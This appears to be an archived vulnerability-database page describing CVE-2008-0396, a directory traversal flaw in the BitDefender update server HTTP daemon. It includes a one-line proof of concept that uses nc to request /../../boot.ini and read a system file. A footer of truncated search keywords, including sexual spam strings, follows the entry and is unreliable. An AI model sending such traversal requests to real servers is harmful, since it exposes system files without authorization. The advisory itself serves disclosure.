about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability


Title BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability
Published 2008-01-19-12:00AM
Updated 2008-01-31-04:37PM
Class Input Validation Error
CVE   CVE-2008-0396
Remote  Yes
Local  No
Credit  Oliver Karow discovered this issue.
Vulnerable  BitDefender Enterprise Manager 0
BitDefender BitDefender Security for File Servers 0
Not Vulnerable  
Code  An attacker can exploit this issue via a browser.The following proof of concept is available:echo -e "GET /../../boot.ini HTTP/1.0\r\r" | nc <server> <port>
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 00:29:31 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
p...readme Office Con news for c None+ /search/ex vidyo six Sandra dew mengxingsh philippine palo britney sp picsex2007 can maxportal. www.9isc.c www.meiriw SSL inject aiswarya r Www free Sex.mail www.in0760 vnc exploi info.968.c sexocon vi Full sex Www df5 c download a inurl:?url news for C php-nuke 2 p...t=//// news for C apache 1.3 CMS is Fre www.anokmo internet v www.hotpen bats show sex Naked Big wallpapers news for c t646t WWW.SEX SE sheji.www. www.sexhou www.chudia ktst.sh198 mambo Remo Www.sexeyi